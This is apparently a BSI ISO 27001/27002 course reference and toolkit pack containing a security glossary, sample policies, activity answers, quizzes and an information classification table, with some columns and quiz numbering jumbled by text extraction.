to be compromised
The process of a user verifying that they
are who they claim to be, usually through
the use of a combination of username and
password
The state of keeping or being kept secret or
private
The state of information being up to date,
accurate and complete
The property of information that relates to
whether authorised users can gain access
to information and associated assets when
required
The potential cause of an unwanted
incident that may result in harm to a
system or organization
A weakness in an asset or group of assets
that can be exploited by one or more
threats
The aspect of a threat that looks at
circumstances which affect the chance of it
materializing
The potential that a given threat will exploit
a vulnerability of an asset and cause an
impact to the organization
©The British Standards Institution 2017
2 of 22
Authorization
Term
Definition
The process of providing permission for a
user to be granted access to information or
information system resources
The UK National Standards body
British Standards Institution
Detective Control
A control which informs that a threat has
exploited a vulnerability
A control which announces the
consequences of not complying with policy
or committing unauthorized actions (e.g.
disciplinary policy)
The translation of data into a secret code
Deterrent Control
Encryption
Asymmetric key cryptography
Symmetric key cryptography
Impact
Incident
Information security
Information Security Management System
(ISMS)
Internet
Malicious code
Non-repudiation
Physical control
Preventive controls
Privacy
Recovery control
Risk assessment
ISM02101ENGX v2.0 Nov 2017
References
An encryption technique where the keys
used to encrypt and decrypt are different
An encryption technique where the keys
used to encrypt and decrypt are the same
The result of a threat exploiting a
vulnerability in an asset
A single or series of unwanted events that
have had or have a significant probability of
having an impact on an asset
The protection of the confidentiality,
integrity and availability of information
The overall framework used to manage
information security across an organization
A global system of interconnected computer
networks
The term used to describe any code in any
part of a software system or script that is
intended to cause undesired effects
The assurance that a person cannot deny
having completed a specific action
A control which prevents threats to an asset
through physical means (e.g. locks on
doors)
A control which is used to prevent
unauthorized actions
The property of an item which defines
whether or not an unauthorised individual
can see it (often used interchangeably with
confidentiality)
A control which returns a system or
information to a previous state
The process assessing whether a risk exists
or not, including the evaluation of the size
of the risk
©The British Standards Institution 2017
3 of 22
References
Activity 2: Information security policy
SAMPLE INFORMATION SECURITY POLICY
1. Purpose
To define the policy requirements for information security within ABC Organization Ltd
2. Scope
Information takes many forms. The scope of this Information Security Policy includes, but is
not limited to:

All information processed by ABC Organization Ltd in pursuit of its operational
activities, regardless of whether it is processed electronically or in paper form,
including but not limited to:
 External customer products, materials, information and reports
 Operational documents, plans, and minutes
 Financial and compliance records
 Employee records
All information processing facilities used in support of ABC Organization Ltd’s
operational activities to store, process and transmit information
 All external organizations that provide services to ABC Organization Ltd in respect of
information processing facilities.
3. Definitions

Information security protects the following three attributes of ABC Organization Ltd’s
information:



Confidentiality – Property that information is not made available or disclosed to
unauthorized individuals, entities, or processes
Integrity – Property of protecting the accuracy and completeness of assets
Availability – Property of being accessible and usable upon demand by an
authorized entity.
Other definitions applicable to this policy:
Employees – ABC Organization Ltd’s staff (permanent and temporary).
Information asset – Any information and information processing assets of value to ABC
Organization Ltd.
Information owner – An individual accountable for the information asset.
Information processing facilities – Any information processing system, service or
infrastructure, or the physical locations housing them.
Subject: Activity 2 - Information Security Policy
Author:
Document Type: Policy
Page: 4 of 4
Authorized by:
Effective Date:
Version 1.0
Next Review:
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
4 of 22
References
4. Risks
Lack of information security can lead to incidents such as breach of confidentiality, the
corruption or unavailability of information which could affect ABC Organization Ltd’s (and its
customers’) financial results, compliance with regulations and legislation, reputation, and
ability to trade.
Without defined and measurable objectives, it is not possible to determine whether ABC
Organization Ltd’s information security activities are effective and efficient.
5. Objectives
The objective of this Information Security Policy is to enable ABC Organization Ltd to
effectively manage its information security threats in order to support its business strategy
and maintain its legal, regulatory, internal and contractual compliance obligations.
ABC Organization Ltd’s security controls cover all threats, whether external or internal,
deliberate or accidental.
Compliance with this Information Security Policy is necessary to ensure business continuity,
and minimize business damage by preventing the occurrence, and minimising the impact, of
information security incidents.
In support of this Information Security Policy, the Board of ABC Organization Ltd accepts its
role in being fully accountable for information security and are committed to:


Managing and reducing risk in an informed manner
Minimizing impact on the organization when information security incidents occur
Ensure the organization has identified the legal requirements and they are complied
with
6. Responsibilities

ABC Organization Ltd’s Executive shall be accountable for ensuring that appropriate security
and compliance controls are identified, implemented and maintained by information owners.
They shall be supported in this task by the Information Security Forum (ISF).
The role and responsibility for managing information security at an operational level shall be
performed by the information security Manager. The information security Manager has direct
responsibility to the ISF for maintaining this Information Security Policy, and providing advice
and guidance on its implementation.
Information owners within ABC Organization Ltd shall be responsible for the identification,
implementation and maintenance of controls that are commensurate with the value of the
information assets they own and the risks to which they are exposed.
It is the responsibility of all employees to adhere to this Information Security Policy.
Non-compliance of the Information Security Policy by any employee shall result in
disciplinary action.
Subject: Activity 2 - Information Security Policy
Author:
Document Type: Policy
Page: 5 of 4
Authorized by:
Effective Date:
Version 1.0
Next Review:
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
5 of 22
References
7. Policy
7.1 Information Security
This Information Security Policy provides that ABC Organization Ltd shall ensure that:














Information assets and information processing facilities shall be protected against
unauthorized access
Information shall be protected from unauthorised disclosure
Confidentiality of information assets shall be a high priority
Integrity of information shall be maintained
ABC Organization Ltd requirements, as identified by information owners, for the
availability of information assets and information processing facilities required for
operational activities shall be met
Statutory, and expressed and implied legal obligations shall be met
Regulatory, contractual and internal compliance obligations shall be met
Requirements for the continuity of information security shall be determined and
maintained within ABC Organization Ltd’s business continuity arrangements
Unauthorized use of information assets and information processing facilities shall be
prohibited; the use of obscene, racist or otherwise offensive statements shall be dealt
with in accordance with other policies published by ABC Organization Ltd
This Information Security Policy shall be communicated to all employees for whom
information security training shall be given
A systematic approach to information security risk management shall be followed and
shall be a dynamic and continual process
Information security shall be managed through a formal Information Security
Management System (ISMS that shall be defined within a documented framework
All breaches of information security, actual or suspected, shall be reported and
investigated in line with [Organization]’s published policies
Controls shall be commensurate with the risks faced by ABC Organization Ltd.
In support of this Information Security Policy, more detailed operational security policies and
processes shall be developed for employees, information assets and information processing
facilities. These policies shall be reviewed at planned intervals or if significant changes occur
to ensure their continuing suitability, adequacy and effectiveness.
7.2 Deviations and exceptions
Any deviations from this policy must be authorised by ABC Organization Ltd’s ISF.
Exceptions and deviations shall be managed through ABC Organization Ltd’ incident
management or change management processes.
8. Key performance measures
Information security objectives shall be agreed on an annual basis, supported by a set of key
performance indicators (KPIs), with milestones and targets. These measures shall be
reported to the ISF for review.
Subject: Activity 2 - Information Security Policy
Author:
Document Type: Policy
Page: 3 of 4
Authorized by:
Effective Date:
Version 1.0
Next Review:
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
6 of 22
References
9. Review and maintenance
This Information Security Policy shall be reviewed annually by the policy owner to ensure it
remains fit for purpose.
10. References

ISO/IEC 27000:2013 Information technology – Security techniques – Information
security management systems – Overview and vocabulary (ISO 27000)
BS ISO/IEC 27001:2013 Information technology – Security techniques – Information
security management systems – Requirements (ISO 27001)
 BS ISO/IEC 27002:2013 Information technology – Security techniques – Code of
practice for information security controls (ISO 27002)
11. Change History

Issue1
27 August 2017
- First published
Subject: Activity 2 - Information Security Policy
Author:
Document Type: Policy
Page: 4 of 4
Authorized by:
Effective Date:
Version 1.0
Next Review:
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
7 of 22
References
Activity 3: Organization of information security
Part 1
Responsibilities 1 - EXECECUTIVE



Provide visible top commitment for security
Accountable for organization wide information security management system
Approve corporate information security policy

Approve organization risk appetite

Determine strategic security planning
Responsibilities 2 – INFORMATION SECURITY FORUM (CONSISTS OF DIRECTORS)


Initiate development of security policies
Review effectiveness of information security

Approve resources

Responsible to senior managers for day-to-day-security
Responsibilities 3 – MANAGERS


Implement security consistent with business requirements
Ensure staff availability for security education and training

Support incident investigations

Adhere to security policies
Responsibilities 4 - EVERYONE



Part 2
Keep organization’s information confidential
Be aware of security implications of their actions
Report suspicious behaviour and security incidents
The directors should be members of the forum as they are budget holders and decision
makers within the organization and are in a position to be able to get things done.
Part 3
The Information Security Manager could report to any non-functional part of the
organization. In the example organization chart used here, the best place is to the Director
of Compliance. A second option would be directly to the CEO or Executive Board.
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
8 of 22
References
Activity 4: Human resource security
For all three roles (and any others in the organization), there are a number of checks that
should be performed, as a matter of course, to ensure that suitable people are being
recruited by the organization in general. Some of these checks are also likely to be required
by various pieces of legislation associated with company law. These are likely to include:






Identification checks
Residency checks
Eligibility to work in the UK checks
Previous work history (references?)
Review and verification of CV
Interview
In addition to the general checks, there may also be some role-specific checks that are
carried out:
 Internal auditor
 Education, e.g. school/university
 Professional qualifications, e.g. CISA
 Testing, in line with the requirements of the role of auditor
 Security clearance may be required depending upon the areas that are to be
audited
 Payroll officer
 Education, e.g. school/university
 Professional qualifications, e.g. accountancy related or similar
 Testing, in line with the requirements of the role of payroll officer



Financial records checks, e.g. it may be unwise to appoint someone into a role
that handles money if they are heavily in debt
Criminal records check, e.g. it may be unwise to appoint someone into a role
that handles money if they have previous convictions for theft or fraud
Firewall administrator
 Education, e.g. school/university
 Professional qualifications, e.g. technical qualifications related to the use and
configuration of firewalls
 Testing, in line with the requirements of the role of firewall administrator

Criminal records checks, e.g. it may be unwise to appoint someone into a role
administering the organization’s firewalls if they have previous convictions for
computer related crime
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
9 of 22
References
Activity 5: Asset management
Asset
Category
Value
Owner
Laptops
Technology
C, I
IT Director
Services and systems
A
Facilities Director or similar
Technology
C, A
IT Director
Technology staff
People
Communications room
Physical
Electrical supply
Mobile phones
C, I, A
C, A
IT Director
Facilities Director or similar
Website source code
Information
C, I
IT Director
Head office building
Physical
C, I, A
Facilities Director or similar
Payroll information
Information
C, I
HR Director
IT Director
Distribution centres
Customer feedback
Reputation
Physical
I, A
Information
Intangible
C
I
Change management process
Intangible/information (if documented)
I, A
Car parking
Physical or not relevant
X or A
Vending machine
Security guards
ISM02101ENGX v2.0 Nov 2017
Physical or not relevant
People
Facilities Director or Similar
Operations Director or similar
Executive
X or A
Facilities Director or similar
C, I, A
Facilities Director or similar
Facilities Director or similar
©The British Standards Institution 2017
10 of 22
Asset
Category
Value
Owner
Staff screening records
Information
C, I
HR Director
Brand
Intangible
I
Executive
HR staff
Web servers
People
Technology
C, I, A
I, A
HR Director
IT Director
Desktop pcs
Technology
C, I
IT Director
Internal audit reports
Information
C, I
Compliance Director
Training material
ISM02101ENGX v2.0 Nov 2017
Information
I
References
HR Director
©The British Standards Institution 2017
11 of 22
References
Activity 6: Access control
Note: The answers below are only examples. It is likely that you have found other valid
controls.
Asset
Laptops
Controls
A.11.2.6
A.11.2.8
Technology Staff
A.9.3.1
A.9.4.1
Communication room
A.11.1.2
A.11.2.1
Website source code
A.9.1.1
A.9.4.1
Payroll information
A.9.4.1
A.10.1.1
ISM02101ENGX v2.0 Nov 2017
Justification
Laptops are invariably removed from site
and so knowing how to protect them
away from the office is important.
Users should be advised on the policy
related to unattended equipment
It is important that users follow best
practice for protecting information they
have access to through the use of
suitable passwords
Users should be restricted to only having
access to the information they need for
their role
Suitable entry controls need to be
provided to prevent unauthorized access
into secure areas such as
communications rooms
Equipment should be sited in such a way
as to prevent unauthorized access. In the
communications room this will include
such things as using lockable cabinets
etc.
Access to source code should only be
available to specific roles in the
organization, such as the website
developer.
Further restrictions can be placed on
access to source code such as only
providing read access for example for
those who have a responsibility to review
code but shouldn’t have sufficient access
to change it.
Restrictions should be placed on access
to sensitive information based on a need
to know principle.
Sensitive information could be encrypted
in storage and during communication to
prevent unauthorized access.
©The British Standards Institution 2017
12 of 22
References
Day one refresher quiz
#
Question:
Answer:
1
How many clauses are there in ISO 27002?
3
Who should determine the content of the Information Security Policy?
2
4
How many different controls are there in ISO 27002?
What is teleworking?
5
Performing ID and residence checks and following up on references is
known as what?
6
One of the biggest causes of security incidents is user error. What is
one of the best controls to combat user error?
7
Clauses in employment contracts that prevent an employee from
using company information after their employment has ended are
known as what?
8
The standard suggests that organizations should draw up and
maintain an inventory of assets. What should be communicated to
users to ensure that these assets are not misused?
9
When disposing of electronic media, the organization must do so inline with the requirements of what other control recommended by the
standard?
10 As well as access to information and information systems what other
aspect of the computing environment needs to be considered for
inclusion within the access control policy?
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
13 of 22
References
#
Question:
11 In order to ensure that the users’ access rights to different
information systems and assets remain appropriate, what should the
organization do?
Answer:
12 What is an asset?
13 What is CIA in terms of information security?
14 Cryptographic techniques can be used to protect the confidentiality of
information when it is stored and communicated. What other aspect
of information security can cryptographic techniques be used to
protect?
15 What is a control?
16 What is authentication?
17 What is the difference between a policy and a process?
18 What is confidentiality?
19 What is integrity?
20 What is availability?
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
14 of 22
References
Activity 7: Change management
There is not necessarily a right or wrong answer to this activity. The discussion following
completion of the activity is likely to focus on the following topics:




Impact of change
Priority of change
Backout plans
Approval (i.e. who was chosen as the approver and why)
Sample form:
ABC Organization Ltd Change Request Form
General information
Change request number: 00001
Requestor Name
Date
John Doe – IT Operations Manager
26 October 20xx
Office
Birmingham
Contact
Desk phone
0121 012 3456
Mobile number
07123 456 789
Email Address
j.doe@abcorg.co.uk
Change request definition
Description – Describe the proposed change
Upgrade all Windows database servers to Windows 20xx.
Justification – Justify why the proposed changes should be implemented
As part of our support contract, we are required to ensure that all our servers are installed with the
latest release of any software. The upgrade also ensures that ABC Organization has a fully patched
Windows environment to guard against increasingly sophisticated cyber attacks.
Impact of not implementing – Explain the impact if the proposed change is not implemented
If the servers are not upgraded, then there is a greater risk of being the victim of cyber attack. Also, in
the near future, our existing version of Windows 20yy will no longer be supported as part of our
maintenance contract leading to an increased technical vulnerability over time.
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
15 of 22
References
Change request impact evaluation:
Check one
High
Medium
Low
Impact description – Describe the impact and justify your choice above
The database servers will be offline while the upgrade takes place and so no database transactions will
be able to take place.
Change request priority:
Check one
1
2
3
Emergency
Priority Justification (describe why you have chosen the priority indicated above)
This change does not need to be done urgently but needs to take place within the next 30 days due to
the terms of our support contract.
Change rollback plan – Describe the rollback process in case of change failure
All servers will be backed up before being upgraded. If the upgrade fails then the servers will be rolled
back to a previous known working configuration and the backups will be restored.
Change test plan – Describe the testing process
When the upgrade is complete a number of test transactions will take place and the database manager
will confirm that all tables and data are intact and accessible by the business.
Change request approval
Name (identify change request approvers)
IT Director
Recommendation
Approve
Reject
Operations Director
Approve
Reject
Approve
Reject
Approve
Reject
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
16 of 22
References
Key:
Impact levels
High – Any change that has a high degree of probability of affecting a significant number of
users or which means that the availability of a key system is affected for significant period of
time.
Medium – Any change that has the probability of affecting several users or which means that
the availability of a system is affected for a long period of time
Low – Any change that will only affect a single user or a small number of users or which
means that the availability of a system is affected for a short period of time
Priority levels
1 – The change is required to take place within 7 days
2 – The change is required to take place within 14 days
3 – The change is required to take place within 30 days
Emergency – The change has already been completed to resolve a security incident or
severe business issue and this form is being completed retrospectively.
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
17 of 22
References
Activity 8: Supplier relationships
Supplier relationships
Please note that the questions below are simply suggestions and there may well be other
questions that you think are more relevant.
1 – What ABC Organization Ltd information or information systems does your organization
have access to?
2 – Do you store ABC Organization Ltd information within your own systems and/or
environment?
3 – Is your organization ISO 27001 certified? If yes, what is the scope of your certification?
4 – Does your organization have an Information Security Policy which is available to all staff
and contractors?
5 – What background screening is conducted for staff and contractors?
6 – What information security awareness, education and training does your organization
conduct with staff and contractors?
7 – Does a failure to comply with company policy lead to disciplinary action?
8 – What access control methods does your organization deploy to prevent unauthorized
access to information?
9 – Are all users allocated a unique username and are they required to choose a complex
password of minimum length that is only known to them?
10 – Under what circumstances will information security events and/or incidents be reported
to ABC Organization Ltd?
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
18 of 22
References
Activity 9: Incident management
Suggested steps that need to be taken:










Arrange to meet the caller to retrieve the laptop
Collect the laptop and ask the caller if any information from the laptop has been
accessed or shared with anyone
Determine who the laptop was last allocated to through the use of the asset tag
Speak to the person who the laptop was last allocated to in order to determine what
information was held on the laptop
Determine the possible impact of unauthorized access to information on the laptop
Contact the disposal company to find out why the laptop ended up on an auction site
with data on the hard-drive still intact
Take steps to ensure that processes are updated to ensure that the problem cannot
re-occur
Determine if the disposal company is in breach of contract
Escalate the incident to outside authorities if necessary (e.g. the ICO)
Seek necessary compensation if appropriate
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
19 of 22
References
Activity 10: Pop quiz
#
Question:
Answer:
2
How many mandatory controls exist in ISO 27002?
None
3
How many main security categories are there in ISO 27002?
35
4
What type of document should be used to describe the rules related to how
an organization manages its information security?
Policy
5
What is the control called that enables organizations to reduce the possibility
of fraud occurring by making different people responsible for different parts
of a process?
Segregation of duties (control 6.1.2 in the standard)
6
When is the best time to introduce information security considerations within
the project management lifecycle?
As soon as possible (i.e. right at the beginning such as at the
requirements gathering phase)
7
The use of DVDs, laptops, USB drives and mobile phones should be
governed by the rules published in which document according to control
6.2.1?
Mobile device policy
Terms and conditions of employment is a highly specific which describes the
duties of an individual within an organization – True or false?
False. Terms and conditions of employment are issued to all employees
and will be identical for all and so describe the duties and
responsibilities that apply to all roles. The specific document would be
a job description.
1
8
9
ISO 27002 provides best practice recommendations for protecting
information. What is the name of the related standard against which
organizations can seek certification?
Suggest a control from the standard which should be used within HR
security prior to employment.
10 Best practice suggests that information security awareness education and
training should be conducted when?
ISM02101ENGX v2.0 Nov 2017
ISO 27001
Either 7.1.1 Screening or 7.1.2 Terms and conditions of employment
During induction when the first starts working for the organization and
then periodically throughout their employment.
©The British Standards Institution 2017
20 of 22
References
#
Question:
Answer:
11
In order for policy documents to be effective they should be linked to what
HR related process in case of non-compliance?
Disciplinary process
12
Individuals within organizations should be allocated to responsibility to
provide day to day protection for important information assets and are
authorized by the business to make risk based decisions about the
protection provided. These individuals are known as what?
Asset owners
13
Why is it useful for an organization to have an up to date asset inventory?
So that the organization knows what assets it has
14
Why is an information classification scheme a good idea?
15
When should labelling of assets with their classification be considered?
It allows for information assets to receive appropriate levels of
protection based on its sensitivity.
16
For controls 8.3.2 and 8.3.3 (disposal of media and physical media transfer)
what else also needs to be considered as media?
Paper
17
The organization should determine who is allowed access to what
information assets and for what reason. What document would include this
information?
Access control policy
18
What two pieces of information associated with a user’s login credentials
should be unique?
Username and password (or other authentication credential such as
token or biometric (e.g. fingerprint))
19
20
When they are in tangible form, i.e. on paper etc.
The organization should ensure that the user access management process
includes information about what levels of access are required within different
systems for different types of user. What is this known as according to
control 9.2.3 in the standard?
Management of privileged access rights (a point is awarded if the word
privileged or privileges etc is mentioned).
Why is it a good idea for a password to be of a minimum length, i.e. eight
characters?
It increases the number of possible combinations of characters within
the password which makes the task for an attacker to crack it more
difficult.
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
21 of 22
References
#
Question:
Answer:
21
Key management (10.1.2)
22
What control goes hand in hand with 10.1.1 Policy on the use of
cryptographic controls?
Control 11.1.4 Protecting against external and environmental threats
includes consideration of what type of threat which is impossible to prevent?
Natural disasters
23
Why is it best practice to not route electricity cables and data cables close
together?
Because the electromagnetic interference from electricity cables could
cause an impact on the data travelling within the data cable
24
What is a clear desk policy designed to do?
Ensure that confidential information is not left on desks when
unattended
25
How many operating procedures must be documented?
26
Communication with the rest of the business before an upgrade to the
system takes place in order to ensure that impact is kept to a minimum is
known as what?
Change management
27
What is the main thing that needs to be understood before appropriate
controls can be determined and implemented when dealing with third
parties?
He risk associated with working with the third party
28
As many as the organization requires
What aspect of incident management is the responsibility of everyone?
Reporting incidents, events, weaknesses etc.
29
Once business continuity plans have been developed what needs to take
place on a regular basis to determine whether or not they are likely to work
when needed?
Testing
30
Organizations should ensure that they identify all applicable legislation,
contractual requirements and what else?
Regulations
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
22 of 22
Toolkit
Please note: BSI provides all the management system content below on an “AS IS”
basis (relevant to this toolkit).
The content is compiled from materials created by BSI and should be used as a
reference source only.
BSI does not warrant the fitness for purpose, completeness or accuracy of the
provided examples below.
Table of contents:
Information classification – Example handling table ...........................................................2
Example access control matrix .........................................................................................5
Access control policy .......................................................................................................7
Clear desk and clear screen policy .................................................................................. 10
Information security incident reporting and management policy ....................................... 12
Information transfer policy ............................................................................................ 17
Physical and environmental security policy ...................................................................... 19
Information security internal audit schedule .................................................................... 29
All items will be available on a memory card to be provided to all delegates.
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
1 of 36
Toolkit
Information classification – Example handling table
[Secret]
[Client confidential]
[Definition]
Information that is
available to named staff
or partners, customers,
suppliers or other third
parties that are subject to
either a confidentiality
agreement or where nondisclosure forms part of a
legally binding agreement
Information that is
available only to a specific
individual or group of
individuals who are staff,
partners, customers,
suppliers or other third
parties who required to
access client based
information as part of
their role
ACCESS RESTRICTION
Named individuals only on
a need to know basis.
Cannot be revealed to
other parties without the
prior agreement of the
senior management team
Restricted to named
individuals or distribution
lists on a need to know
basis. Cannot be revealed
to other parties without
the prior agreement of
the information asset
owner
DISCLOSURE
APPROVAL
ISM02101ENGX v2.0 Nov 2017
Disclosure is approved by
a member of the senior
management team and
the information owner
Disclosure is approved by
the information owner
©The British Standards Institution 2017
[Internal use only]
Information that is
available to all staff and
which may also be shared
with partners, customers,
suppliers or other third
parties on an as needed
basis and where a
confidentiality agreement
has been signed or where
non-disclosure is part of a
legally binding agreement
[Public]
Information that is
available in the public
domain or that
represents no impact on
the business if it were to
be made public
All staff and authorised
parties. No access control
requirements for staff.
Controlled access for
trusted third parties
General public
Disclosure to staff,
approval not required.
Disclosure to third parties
is approved by the
information owner
Disclosure approval not
required
No access controls
2 of 36
Toolkit
EXAMPLES
LABELLING
Internal mailing
External mailing
[Secret]
Merger and acquisition
information, incident
reports and controlled
evidence
Information, media,
containers and outputs to
be labelled as “SECRET”
Internal unmarked sealed
envelope delivered by
hand
Tamper evident envelope
delivered by hand (e.g.
courier) or registered mail
Email – internal
Email not allowed
Email - external
Email not allowed
PAPER
HARD DRIVES
ISM02101ENGX v2.0 Nov 2017
Cross cut shred.
Destruction of all
information to be logged
High intensity format
followed by physical
[Client confidential]
[Internal use only]
[Public]
Tenders, quotes,
contracts, financial
records
Policies, processes,
procedures
Marketing material
Information, media,
containers and outputs to
be labelled as “CLIENT
CONFIDENTIAL”
Information, media,
containers and outputs
labelled as “INTERNAL
USE ONLY”
No label required
Sealed envelope delivered
by hand or by internal
courier
Unsealed envelope
No envelope
Unsealed envelope
delivered by courier or
standard mail
No restrictions
TRANSFER
Tamper evident envelope
Email allowed provided
encrypted before sending
Email allowed
No restrictions
Email allowed provided
encrypted before sending
Email allowed but only to
approved recipients
No restrictions
Cross cut shred.
Destruction of information
to be logged if carried out
by third party
Cross cut shred
No restrictions
Format
No restrictions
DISPOSAL
Format and destroy
©The British Standards Institution 2017
3 of 36
Toolkit
destruction
[Secret]
HARDCOPY
ELECTRONIC
[Client confidential]
Kept in a fire proof safe or
controlled area protected
by PIN, combination lock
or controlled key
Kept in access controlled
folders on a secure server
which is appropriately
backed up and encrypted
STORAGE
[Internal use only]
[Public]
Kept in fire safe
Kept in cupboards or on
available shelving
No restrictions
Kept in access controlled
folders on corporate or
local server that is
appropriately backed up
and encrypted
Kept in public folders on
corporate or local server
that is appropriately
backed up
Kept in public folders on
a server that is
appropriately backed up
Kept in locked storage
Note: the above table is only a small example and in reality many more assets and scenarios are likely to need to be
included in column one for which rules should be defined for each of the classification levels defined.
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
4 of 36
Toolkit
Example access control matrix
The example below is based upon the information supplied within activities 3 and 5 of the course. This matrix when fully completed for an
organization represents the baseline access that can be pre-authorized by the business and that can be used to ensure that during the
starters and leavers process, new users only get access to the assets and resources required for their role.
Further enhancements to this template can be made by also including privileges authorized for each role.
CEO
Comms Room
Website Source Code
Head Office Building
Distribution Centres
Customer Feedback
Head of Information Security
Compliance Director
HR Director
IT Director
Payroll Manager
Learning & Development
Manager
Web Development Manager
IT Operations Manager
Internal Auditor
Payroll Officer
Trainer
Developer
Tester
Firewall Administrator
Database Manager
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
5 of 36
Toolkit
CEO
Payroll
Information
Staff Screening
Records
Web Servers
Training Material
Internal Audit Reports
Head of Information Security
Compliance Director
HR Director
IT Director
Payroll Manager
Learning & Development
Manager
Web Development Manager
IT Operations Manager
Internal Auditor
Payroll Officer
Trainer
Developer
Tester
Firewall Administrator
Database Manager
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
6 of 36
Toolkit (Access control policy)
Access control policy
Objectives
To define the policy requirements for logical and physical access to ABC Organization Ltd’s
information and information processing facilities.
To limit access to and provide appropriate administration controls over access by users to
ABC Organization Ltd’s information and information processing facilities, including but not
limited to systems, applications, documented information, business processes and sites
Scope
The Access Control Policy applies to all ABC Organization Ltd’s information and information
processing facilities.
Policy
It is the policy of ABC Organization Ltd that:


Access
Access



must be granted and maintained on a need-to-know principle
must be granted in a manner that maintains:
The confidentiality, integrity and availability of information assets
Compliance with legislation
A balance between control and business need
An infrastructure which facilitates data sharing without sacrificing the
security of information services
Access to information

Access to information must be restricted to authorized staff, partners and suppliers.
All information assets must be owned by an individual within ABC Organization Ltd.
Information owners must classify their owned assets in accordance with the [information
classification, handling and protection] policy. Information owners must ensure or assist in
the development of appropriate access control rules access rights and restrictions for
specific user roles in relation to their owned assets in compliance with any applicable
[internal][segregation of duties] controls. Information owners must authorize staff requiring
access to information assets owned by them.
Access levels must be verified by information owners before access is approved. All supplier
access must be authorized by the information owner and, if necessary, monitored.
Subject
Access control policy
Effective Date
Document Type
Policy
Version
Owner
Authorized by
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
1 of 3
©The British Standards Institution 2017
7 of 36
Toolkit (Access control policy)
All access requests must be made in writing by [line managers]. Information owners must
not be permitted to act as both access requestor and approver.
Access administration roles must be segregated and must not be permitted to both approve
and grant access. Any identified role conflicts must be reported to the [Information Security
Manager].
Access administration records must be maintained.
Access must not be provided through generic or shared user accounts.
All passwords used to access information must conform to ABC Organization Ltd’s
requirements relating to password composition, length, expiry date and confidentiality.
Passwords allocated by system administrators must be configured to require changing by
the authorized user upon first login.
Information systems deemed critical by the information owner must be monitored to detect
non-compliance and records of evidence collected in case of security access events. The
level of monitoring required for individual systems and facilities must be defined by the
information owner.
Access rights must be periodically reviewed by the [Information Security Management
Committee] in accordance with the [Information Classification Scheme].
Access to information assets must be amended or removed when staff change roles.
Access to information assets must be revoked immediately upon termination of
employment.
Privileged access
Staff requiring privileged access to ABC Organization Ltd’s information and supporting
assets, e.g. IT administrators or system developers, must be specifically authorized to be
granted such access by the IT Manager or his delegates.
Staff with access to systems under development must not also have access to the live
system. Should access to live systems be required it must be specifically authorized, be
aligned with a specific reason and be limited in duration. Access to live systems and/or data
must be read only.
The segregation of responsibilities in respect if IT staff must be supported by the access
levels assigned.
Staff must not use system accounts such as ‘Administrator’ to access IT systems or
infrastructure; access must be made using individually assigned accounts.
Subject
Access control policy
Effective Date
Document Type
Policy
Version
Owner
Authorized by
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
2 of 3
©The British Standards Institution 2017
8 of 36
Toolkit (Access control policy)
Access to ABC Organization Ltd buildings
Access to ABC Organization Ltd’s offices [and operational sites], and disaster recovery
buildings, must be controlled on a ‘need to access’ basis only.
Visitors must sign in before entering ABC organization’s premises and sign out upon
leaving. Whilst in ABC Organization Ltd premises, they must be accompanied at all times.
Access to the company’s offices must be revoked immediately upon termination of
employment and any access token returned.
Responsibilities
All staff must comply with this access control policy.
The [facilities management function] must develop, publish, and maintain building and
physical security procedures and standards to support the achievement of compliance with
this policy. The [IT function] must develop, publish, and maintain IT procedures and
standards to support the achievement of compliance with this policy.
All [managers] must be responsible for implementing the policy within their areas of
responsibility.
All [information owners] must be responsible for defining access rights by role for all the
information and supporting systems within their remit.
Consequences of non-compliance
Any breaches of this policy by employees may result in disciplinary action being taken
under ABC Organization’s disciplinary process. Non-compliance by contracted third parties
or their employees may result in termination of the supplier’s contract.
Policy review and maintenance
This access control policy must be reviewed annually by the policy owner or [Information
Security Management Committee] to ensure it remains fit for purpose.
Change history
Issue1
XX Month 20XX
- First published
Subject
Access control policy
Effective Date
Document Type
Policy
Version
Owner
Authorized by
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
3 of 3
©The British Standards Institution 2017
9 of 36
Toolkit (Clear desk and clear screen policy)
Clear desk and clear screen policy
Objective
The objective of this clear desk and clear screen policy is to ensure that the information
and information processing facilities of ABC Organization Ltd are adequately protected by a
combination of logical and physical controls.
Scope
This clear desk and clear screen policy applies to all employees that use information and
information processing facilities irrespective of whether they are office based or work
remotely.
Policy
It is ABC Organization Ltd’s policy to ensure that all company and customer information,
whether in electronic or hardcopy format, must be appropriately secured at all times.
This clear desk and clear screen policy is approved by, and has the full support of, the
Directors of ABC Organization Ltd.
Outside normal working hours, all confidential information, whether marked or not, must
be secured in accordance with ABC Organization Ltd’s Information Security Classification
Policy. During office hours such information must be concealed if desks are to be left
unattended for long periods.
All staff must protect the confidentiality of information by ensuring their computer is
protected by a password enabled screensaver when they are away from their desk.
Outside normal working hours, mail must not be left on desks and unopened mail in mail
trays must be locked away.
When it is to be disposed of, all customer and ABC Organization Ltd classified information
must be placed in an approved confidential waste container or shredded.
All documents must be immediately retrieved from printers, photocopiers and fax
machines. Staff handling hardcopies of ABC Organization Ltd internal or customer
information must take appropriate steps to ensure their protection.
Those in charge of meetings must ensure that no confidential information is left in meeting
rooms.
At night, all computers must be logged off unless required to remain on for operational
purposes.
Laptops, mobile telephones, swipe cards and other portable assets must be locked away
when left unattended for extended periods.
Subject
Clear desk and clear screen policy
Effective Date
